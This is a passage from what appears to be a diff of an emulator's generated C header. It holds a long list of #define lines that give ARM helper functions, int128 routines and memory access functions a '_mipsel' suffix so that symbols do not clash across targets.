helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mipsel +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mipsel +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mipsel +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mipsel +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mipsel +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mipsel +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mipsel +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mipsel +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mipsel +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mipsel +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mipsel +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mipsel +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mipsel +#define helper_ldb_cmmu helper_ldb_cmmu_mipsel +#define helper_ldb_mmu helper_ldb_mmu_mipsel +#define helper_ldl_cmmu helper_ldl_cmmu_mipsel +#define helper_ldl_mmu helper_ldl_mmu_mipsel +#define helper_ldq_cmmu helper_ldq_cmmu_mipsel +#define helper_ldq_mmu helper_ldq_mmu_mipsel +#define helper_ldw_cmmu helper_ldw_cmmu_mipsel +#define helper_ldw_mmu helper_ldw_mmu_mipsel +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mipsel +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mipsel +#define helper_le_ldq_mmu helper_le_ldq_mmu_mipsel +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mipsel +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mipsel +#define helper_le_ldul_mmu helper_le_ldul_mmu_mipsel +#define helper_le_lduw_mmu helper_le_lduw_mmu_mipsel +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mipsel +#define helper_le_stl_mmu helper_le_stl_mmu_mipsel +#define helper_le_stq_mmu helper_le_stq_mmu_mipsel +#define helper_le_stw_mmu helper_le_stw_mmu_mipsel +#define helper_msr_i_pstate helper_msr_i_pstate_mipsel +#define helper_neon_abd_f32 helper_neon_abd_f32_mipsel +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mipsel +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mipsel +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mipsel +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mipsel +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mipsel +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mipsel +#define helper_neon_abd_s16 helper_neon_abd_s16_mipsel +#define helper_neon_abd_s32 helper_neon_abd_s32_mipsel +#define helper_neon_abd_s8 helper_neon_abd_s8_mipsel +#define helper_neon_abd_u16 helper_neon_abd_u16_mipsel +#define helper_neon_abd_u32 helper_neon_abd_u32_mipsel +#define helper_neon_abd_u8 helper_neon_abd_u8_mipsel +#define helper_neon_abs_s16 helper_neon_abs_s16_mipsel +#define helper_neon_abs_s8 helper_neon_abs_s8_mipsel +#define helper_neon_acge_f32 helper_neon_acge_f32_mipsel +#define helper_neon_acge_f64 helper_neon_acge_f64_mipsel +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mipsel +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mipsel +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mipsel +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mipsel +#define helper_neon_addl_u16 helper_neon_addl_u16_mipsel +#define helper_neon_addl_u32 helper_neon_addl_u32_mipsel +#define helper_neon_add_u16 helper_neon_add_u16_mipsel +#define helper_neon_add_u8 helper_neon_add_u8_mipsel +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mipsel +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mipsel +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mipsel +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mipsel +#define helper_neon_cge_f32 helper_neon_cge_f32_mipsel +#define helper_neon_cge_s16 helper_neon_cge_s16_mipsel +#define helper_neon_cge_s32 helper_neon_cge_s32_mipsel +#define helper_neon_cge_s8 helper_neon_cge_s8_mipsel +#define helper_neon_cge_u16 helper_neon_cge_u16_mipsel +#define helper_neon_cge_u32 helper_neon_cge_u32_mipsel +#define helper_neon_cge_u8 helper_neon_cge_u8_mipsel +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mipsel +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mipsel +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mipsel +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mipsel +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mipsel +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mipsel +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mipsel +#define helper_neon_cls_s16 helper_neon_cls_s16_mipsel +#define helper_neon_cls_s32 helper_neon_cls_s32_mipsel +#define helper_neon_cls_s8 helper_neon_cls_s8_mipsel +#define helper_neon_clz_u16 helper_neon_clz_u16_mipsel +#define helper_neon_clz_u8 helper_neon_clz_u8_mipsel +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mipsel +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mipsel +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mipsel +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mipsel +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mipsel +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mipsel +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mipsel +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mipsel +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mipsel +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mipsel +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mipsel +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mipsel +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mipsel +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mipsel +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mipsel +#define helper_neon_max_s16 helper_neon_max_s16_mipsel +#define helper_neon_max_s32 helper_neon_max_s32_mipsel +#define helper_neon_max_s8 helper_neon_max_s8_mipsel +#define helper_neon_max_u16 helper_neon_max_u16_mipsel +#define helper_neon_max_u32 helper_neon_max_u32_mipsel +#define helper_neon_max_u8 helper_neon_max_u8_mipsel +#define helper_neon_min_s16 helper_neon_min_s16_mipsel +#define helper_neon_min_s32 helper_neon_min_s32_mipsel +#define helper_neon_min_s8 helper_neon_min_s8_mipsel +#define helper_neon_min_u16 helper_neon_min_u16_mipsel +#define helper_neon_min_u32 helper_neon_min_u32_mipsel +#define helper_neon_min_u8 helper_neon_min_u8_mipsel +#define helper_neon_mull_p8 helper_neon_mull_p8_mipsel +#define helper_neon_mull_s16 helper_neon_mull_s16_mipsel +#define helper_neon_mull_s8 helper_neon_mull_s8_mipsel +#define helper_neon_mull_u16 helper_neon_mull_u16_mipsel +#define helper_neon_mull_u8 helper_neon_mull_u8_mipsel +#define helper_neon_mul_p8 helper_neon_mul_p8_mipsel +#define helper_neon_mul_u16 helper_neon_mul_u16_mipsel +#define helper_neon_mul_u8 helper_neon_mul_u8_mipsel +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mipsel +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mipsel +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mipsel +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mipsel +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mipsel +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mipsel +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mipsel +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mipsel +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mipsel +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mipsel +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mipsel +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mipsel +#define helper_neon_negl_u16 helper_neon_negl_u16_mipsel +#define helper_neon_negl_u32 helper_neon_negl_u32_mipsel +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mipsel +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mipsel +#define helper_neon_padd_u16 helper_neon_padd_u16_mipsel +#define helper_neon_padd_u8 helper_neon_padd_u8_mipsel +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mipsel +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mipsel +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mipsel +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mipsel +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mipsel +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mipsel +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mipsel +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mipsel +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mipsel +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mipsel +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mipsel +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mipsel +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mipsel +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mipsel +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mipsel +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mipsel +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mipsel +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mipsel +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mipsel +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mipsel +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mipsel +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mipsel +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mipsel +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mipsel +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mipsel +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mipsel +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mipsel +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mipsel +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mipsel +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mipsel +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mipsel +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mipsel +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mipsel +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mipsel +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mipsel +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mipsel +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mipsel +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mipsel +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mipsel +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mipsel +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mipsel +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mipsel +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mipsel +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mipsel +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mipsel +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mipsel +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mipsel +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mipsel +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mipsel +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mipsel +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mipsel +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mipsel +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mipsel +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mipsel +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mipsel +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mipsel +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mipsel +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mipsel +#define helper_neon_qunzip16 helper_neon_qunzip16_mipsel +#define helper_neon_qunzip32 helper_neon_qunzip32_mipsel +#define helper_neon_qunzip8 helper_neon_qunzip8_mipsel +#define helper_neon_qzip16 helper_neon_qzip16_mipsel +#define helper_neon_qzip32 helper_neon_qzip32_mipsel +#define helper_neon_qzip8 helper_neon_qzip8_mipsel +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mipsel +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mipsel +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mipsel +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mipsel +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mipsel +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mipsel +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mipsel +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mipsel +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mipsel +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mipsel +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mipsel +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mipsel +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mipsel +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mipsel +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mipsel +#define helper_neon_shl_s16 helper_neon_shl_s16_mipsel +#define helper_neon_shl_s32 helper_neon_shl_s32_mipsel +#define helper_neon_shl_s64 helper_neon_shl_s64_mipsel +#define helper_neon_shl_s8 helper_neon_shl_s8_mipsel +#define helper_neon_shl_u16 helper_neon_shl_u16_mipsel +#define helper_neon_shl_u32 helper_neon_shl_u32_mipsel +#define helper_neon_shl_u64 helper_neon_shl_u64_mipsel +#define helper_neon_shl_u8 helper_neon_shl_u8_mipsel +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mipsel +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mipsel +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mipsel +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mipsel +#define helper_neon_subl_u16 helper_neon_subl_u16_mipsel +#define helper_neon_subl_u32 helper_neon_subl_u32_mipsel +#define helper_neon_sub_u16 helper_neon_sub_u16_mipsel +#define helper_neon_sub_u8 helper_neon_sub_u8_mipsel +#define helper_neon_tbl helper_neon_tbl_mipsel +#define helper_neon_tst_u16 helper_neon_tst_u16_mipsel +#define helper_neon_tst_u32 helper_neon_tst_u32_mipsel +#define helper_neon_tst_u8 helper_neon_tst_u8_mipsel +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mipsel +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mipsel +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mipsel +#define helper_neon_unzip16 helper_neon_unzip16_mipsel +#define helper_neon_unzip8 helper_neon_unzip8_mipsel +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mipsel +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mipsel +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mipsel +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mipsel +#define helper_neon_widen_s16 helper_neon_widen_s16_mipsel +#define helper_neon_widen_s8 helper_neon_widen_s8_mipsel +#define helper_neon_widen_u16 helper_neon_widen_u16_mipsel +#define helper_neon_widen_u8 helper_neon_widen_u8_mipsel +#define helper_neon_zip16 helper_neon_zip16_mipsel +#define helper_neon_zip8 helper_neon_zip8_mipsel +#define helper_pre_hvc helper_pre_hvc_mipsel +#define helper_pre_smc helper_pre_smc_mipsel +#define helper_qadd16 helper_qadd16_mipsel +#define helper_qadd8 helper_qadd8_mipsel +#define helper_qaddsubx helper_qaddsubx_mipsel +#define helper_qsub16 helper_qsub16_mipsel +#define helper_qsub8 helper_qsub8_mipsel +#define helper_qsubaddx helper_qsubaddx_mipsel +#define helper_rbit helper_rbit_mipsel +#define helper_recpe_f32 helper_recpe_f32_mipsel +#define helper_recpe_f64 helper_recpe_f64_mipsel +#define helper_recpe_u32 helper_recpe_u32_mipsel +#define helper_recps_f32 helper_recps_f32_mipsel +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mipsel +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mipsel +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mipsel +#define helper_ret_stb_mmu helper_ret_stb_mmu_mipsel +#define helper_rintd helper_rintd_mipsel +#define helper_rintd_exact helper_rintd_exact_mipsel +#define helper_rints helper_rints_mipsel +#define helper_rints_exact helper_rints_exact_mipsel +#define helper_ror_cc helper_ror_cc_mipsel +#define helper_rsqrte_f32 helper_rsqrte_f32_mipsel +#define helper_rsqrte_f64 helper_rsqrte_f64_mipsel +#define helper_rsqrte_u32 helper_rsqrte_u32_mipsel +#define helper_rsqrts_f32 helper_rsqrts_f32_mipsel +#define helper_sadd16 helper_sadd16_mipsel +#define helper_sadd8 helper_sadd8_mipsel +#define helper_saddsubx helper_saddsubx_mipsel +#define helper_sar_cc helper_sar_cc_mipsel +#define helper_sdiv helper_sdiv_mipsel +#define helper_sel_flags helper_sel_flags_mipsel +#define helper_set_cp_reg helper_set_cp_reg_mipsel +#define helper_set_cp_reg64 helper_set_cp_reg64_mipsel +#define helper_set_neon_rmode helper_set_neon_rmode_mipsel +#define helper_set_r13_banked helper_set_r13_banked_mipsel +#define helper_set_rmode helper_set_rmode_mipsel +#define helper_set_user_reg helper_set_user_reg_mipsel +#define helper_shadd16 helper_shadd16_mipsel +#define helper_shadd8 helper_shadd8_mipsel +#define helper_shaddsubx helper_shaddsubx_mipsel +#define helper_shl_cc helper_shl_cc_mipsel +#define helper_shr_cc helper_shr_cc_mipsel +#define helper_shsub16 helper_shsub16_mipsel +#define helper_shsub8 helper_shsub8_mipsel +#define helper_shsubaddx helper_shsubaddx_mipsel +#define helper_ssat helper_ssat_mipsel +#define helper_ssat16 helper_ssat16_mipsel +#define helper_ssub16 helper_ssub16_mipsel +#define helper_ssub8 helper_ssub8_mipsel +#define helper_ssubaddx helper_ssubaddx_mipsel +#define helper_stb_mmu helper_stb_mmu_mipsel +#define helper_stl_mmu helper_stl_mmu_mipsel +#define helper_stq_mmu helper_stq_mmu_mipsel +#define helper_stw_mmu helper_stw_mmu_mipsel +#define helper_sub_saturate helper_sub_saturate_mipsel +#define helper_sub_usaturate helper_sub_usaturate_mipsel +#define helper_sxtb16 helper_sxtb16_mipsel +#define helper_uadd16 helper_uadd16_mipsel +#define helper_uadd8 helper_uadd8_mipsel +#define helper_uaddsubx helper_uaddsubx_mipsel +#define helper_udiv helper_udiv_mipsel +#define helper_uhadd16 helper_uhadd16_mipsel +#define helper_uhadd8 helper_uhadd8_mipsel +#define helper_uhaddsubx helper_uhaddsubx_mipsel +#define helper_uhsub16 helper_uhsub16_mipsel +#define helper_uhsub8 helper_uhsub8_mipsel +#define helper_uhsubaddx helper_uhsubaddx_mipsel +#define helper_uqadd16 helper_uqadd16_mipsel +#define helper_uqadd8 helper_uqadd8_mipsel +#define helper_uqaddsubx helper_uqaddsubx_mipsel +#define helper_uqsub16 helper_uqsub16_mipsel +#define helper_uqsub8 helper_uqsub8_mipsel +#define helper_uqsubaddx helper_uqsubaddx_mipsel +#define helper_usad8 helper_usad8_mipsel +#define helper_usat helper_usat_mipsel +#define helper_usat16 helper_usat16_mipsel +#define helper_usub16 helper_usub16_mipsel +#define helper_usub8 helper_usub8_mipsel +#define helper_usubaddx helper_usubaddx_mipsel +#define helper_uxtb16 helper_uxtb16_mipsel +#define helper_v7m_mrs helper_v7m_mrs_mipsel +#define helper_v7m_msr helper_v7m_msr_mipsel +#define helper_vfp_absd helper_vfp_absd_mipsel +#define helper_vfp_abss helper_vfp_abss_mipsel +#define helper_vfp_addd helper_vfp_addd_mipsel +#define helper_vfp_adds helper_vfp_adds_mipsel +#define helper_vfp_cmpd helper_vfp_cmpd_mipsel +#define helper_vfp_cmped helper_vfp_cmped_mipsel +#define helper_vfp_cmpes helper_vfp_cmpes_mipsel +#define helper_vfp_cmps helper_vfp_cmps_mipsel +#define helper_vfp_divd helper_vfp_divd_mipsel +#define helper_vfp_divs helper_vfp_divs_mipsel +#define helper_vfp_fcvtds helper_vfp_fcvtds_mipsel +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mipsel +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mipsel +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mipsel +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mipsel +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mipsel +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mipsel +#define helper_vfp_maxd helper_vfp_maxd_mipsel +#define helper_vfp_maxnumd helper_vfp_maxnumd_mipsel +#define helper_vfp_maxnums helper_vfp_maxnums_mipsel +#define helper_vfp_maxs helper_vfp_maxs_mipsel +#define helper_vfp_mind helper_vfp_mind_mipsel +#define helper_vfp_minnumd helper_vfp_minnumd_mipsel +#define helper_vfp_minnums helper_vfp_minnums_mipsel +#define helper_vfp_mins helper_vfp_mins_mipsel +#define helper_vfp_muladdd helper_vfp_muladdd_mipsel +#define helper_vfp_muladds helper_vfp_muladds_mipsel +#define helper_vfp_muld helper_vfp_muld_mipsel +#define helper_vfp_muls helper_vfp_muls_mipsel +#define helper_vfp_negd helper_vfp_negd_mipsel +#define helper_vfp_negs helper_vfp_negs_mipsel +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mipsel +#define helper_vfp_shtod helper_vfp_shtod_mipsel +#define helper_vfp_shtos helper_vfp_shtos_mipsel +#define helper_vfp_sitod helper_vfp_sitod_mipsel +#define helper_vfp_sitos helper_vfp_sitos_mipsel +#define helper_vfp_sltod helper_vfp_sltod_mipsel +#define helper_vfp_sltos helper_vfp_sltos_mipsel +#define helper_vfp_sqrtd helper_vfp_sqrtd_mipsel +#define helper_vfp_sqrts helper_vfp_sqrts_mipsel +#define helper_vfp_sqtod helper_vfp_sqtod_mipsel +#define helper_vfp_sqtos helper_vfp_sqtos_mipsel +#define helper_vfp_subd helper_vfp_subd_mipsel +#define helper_vfp_subs helper_vfp_subs_mipsel +#define helper_vfp_toshd helper_vfp_toshd_mipsel +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mipsel +#define helper_vfp_toshs helper_vfp_toshs_mipsel +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mipsel +#define helper_vfp_tosid helper_vfp_tosid_mipsel +#define helper_vfp_tosis helper_vfp_tosis_mipsel +#define helper_vfp_tosizd helper_vfp_tosizd_mipsel +#define helper_vfp_tosizs helper_vfp_tosizs_mipsel +#define helper_vfp_tosld helper_vfp_tosld_mipsel +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mipsel +#define helper_vfp_tosls helper_vfp_tosls_mipsel +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mipsel +#define helper_vfp_tosqd helper_vfp_tosqd_mipsel +#define helper_vfp_tosqs helper_vfp_tosqs_mipsel +#define helper_vfp_touhd helper_vfp_touhd_mipsel +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mipsel +#define helper_vfp_touhs helper_vfp_touhs_mipsel +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mipsel +#define helper_vfp_touid helper_vfp_touid_mipsel +#define helper_vfp_touis helper_vfp_touis_mipsel +#define helper_vfp_touizd helper_vfp_touizd_mipsel +#define helper_vfp_touizs helper_vfp_touizs_mipsel +#define helper_vfp_tould helper_vfp_tould_mipsel +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mipsel +#define helper_vfp_touls helper_vfp_touls_mipsel +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mipsel +#define helper_vfp_touqd helper_vfp_touqd_mipsel +#define helper_vfp_touqs helper_vfp_touqs_mipsel +#define helper_vfp_uhtod helper_vfp_uhtod_mipsel +#define helper_vfp_uhtos helper_vfp_uhtos_mipsel +#define helper_vfp_uitod helper_vfp_uitod_mipsel +#define helper_vfp_uitos helper_vfp_uitos_mipsel +#define helper_vfp_ultod helper_vfp_ultod_mipsel +#define helper_vfp_ultos helper_vfp_ultos_mipsel +#define helper_vfp_uqtod helper_vfp_uqtod_mipsel +#define helper_vfp_uqtos helper_vfp_uqtos_mipsel +#define helper_wfe helper_wfe_mipsel +#define helper_wfi helper_wfi_mipsel +#define hex2decimal hex2decimal_mipsel +#define hw_breakpoint_update hw_breakpoint_update_mipsel +#define hw_breakpoint_update_all hw_breakpoint_update_all_mipsel +#define hw_watchpoint_update hw_watchpoint_update_mipsel +#define hw_watchpoint_update_all hw_watchpoint_update_all_mipsel +#define _init _init_mipsel +#define init_cpreg_list init_cpreg_list_mipsel +#define init_lists init_lists_mipsel +#define input_type_enum input_type_enum_mipsel +#define int128_2_64 int128_2_64_mipsel +#define int128_add int128_add_mipsel +#define int128_addto int128_addto_mipsel +#define int128_and int128_and_mipsel +#define int128_eq int128_eq_mipsel +#define int128_ge int128_ge_mipsel +#define int128_get64 int128_get64_mipsel +#define int128_gt int128_gt_mipsel +#define int128_le int128_le_mipsel +#define int128_lt int128_lt_mipsel +#define int128_make64 int128_make64_mipsel +#define int128_max int128_max_mipsel +#define int128_min int128_min_mipsel +#define int128_ne int128_ne_mipsel +#define int128_neg int128_neg_mipsel +#define int128_nz int128_nz_mipsel +#define int128_rshift int128_rshift_mipsel +#define int128_sub int128_sub_mipsel +#define int128_subfrom int128_subfrom_mipsel +#define int128_zero int128_zero_mipsel +#define int16_to_float32 int16_to_float32_mipsel +#define int16_to_float64 int16_to_float64_mipsel +#define int32_to_float128 int32_to_float128_mipsel +#define int32_to_float32 int32_to_float32_mipsel +#define int32_to_float64 int32_to_float64_mipsel +#define int32_to_floatx80 int32_to_floatx80_mipsel +#define int64_to_float128 int64_to_float128_mipsel +#define int64_to_float32 int64_to_float32_mipsel +#define int64_to_float64 int64_to_float64_mipsel +#define int64_to_floatx80 int64_to_floatx80_mipsel +#define invalidate_and_set_dirty invalidate_and_set_dirty_mipsel +#define invalidate_page_bitmap invalidate_page_bitmap_mipsel +#define io_mem_read io_mem_read_mipsel +#define io_mem_write io_mem_write_mipsel +#define io_readb io_readb_mipsel +#define io_readl io_readl_mipsel +#define io_readq io_readq_mipsel +#define io_readw io_readw_mipsel +#define iotlb_to_region iotlb_to_region_mipsel +#define io_writeb io_writeb_mipsel +#define io_writel io_writel_mipsel +#define io_writeq io_writeq_mipsel +#define io_writew io_writew_mipsel +#define is_a64 is_a64_mipsel +#define is_help_option is_help_option_mipsel +#define isr_read isr_read_mipsel +#define is_valid_option_list is_valid_option_list_mipsel +#define iwmmxt_load_creg iwmmxt_load_creg_mipsel +#define iwmmxt_load_reg iwmmxt_load_reg_mipsel +#define iwmmxt_store_creg iwmmxt_store_creg_mipsel +#define iwmmxt_store_reg iwmmxt_store_reg_mipsel +#define __jit_debug_descriptor __jit_debug_descriptor_mipsel +#define __jit_debug_register_code __jit_debug_register_code_mipsel +#define kvm_to_cpreg_id kvm_to_cpreg_id_mipsel +#define last_ram_offset last_ram_offset_mipsel +#define ldl_be_p ldl_be_p_mipsel +#define ldl_be_phys ldl_be_phys_mipsel +#define ldl_he_p ldl_he_p_mipsel +#define ldl_le_p ldl_le_p_mipsel +#define ldl_le_phys ldl_le_phys_mipsel +#define ldl_phys ldl_phys_mipsel +#define ldl_phys_internal ldl_phys_internal_mipsel +#define ldq_be_p ldq_be_p_mipsel +#define ldq_be_phys ldq_be_phys_mipsel +#define ldq_he_p ldq_he_p_mipsel +#define ldq_le_p ldq_le_p_mipsel +#define ldq_le_phys ldq_le_phys_mipsel +#define ldq_phys ldq_phys_mipsel +#define ldq_phys_internal ldq_phys_internal_mipsel +#define ldst_name ldst_name_mipsel +#define ldub_p ldub_p_mipsel +#define ldub_phys ldub_phys_mipsel +#define lduw_be_p lduw_be_p_mipsel +#define lduw_be_phys lduw_be_phys_mipsel +#define lduw_he_p lduw_he_p_mipsel +#define lduw_le_p lduw_le_p_mipsel +#define lduw_le_phys lduw_le_phys_mipsel +#define lduw_phys lduw_phys_mipsel +#define lduw_phys_internal lduw_phys_internal_mipsel +#define le128 le128_mipsel +#define linked_bp_matches linked_bp_matches_mipsel +#define listener_add_address_space listener_add_address_space_mipsel +#define load_cpu_offset load_cpu_offset_mipsel +#define load_reg load_reg_mipsel +#define load_reg_var load_reg_var_mipsel +#define log_cpu_state log_cpu_state_mipsel +#define lpae_cp_reginfo lpae_cp_reginfo_mipsel +#define lt128 lt128_mipsel +#define machine_class_init machine_class_init_mipsel +#define machine_finalize machine_finalize_mipsel +#define machine_info machine_info_mipsel +#define machine_initfn machine_initfn_mipsel +#define machine_register_types machine_register_types_mipsel +#define machvirt_init machvirt_init_mipsel +#define 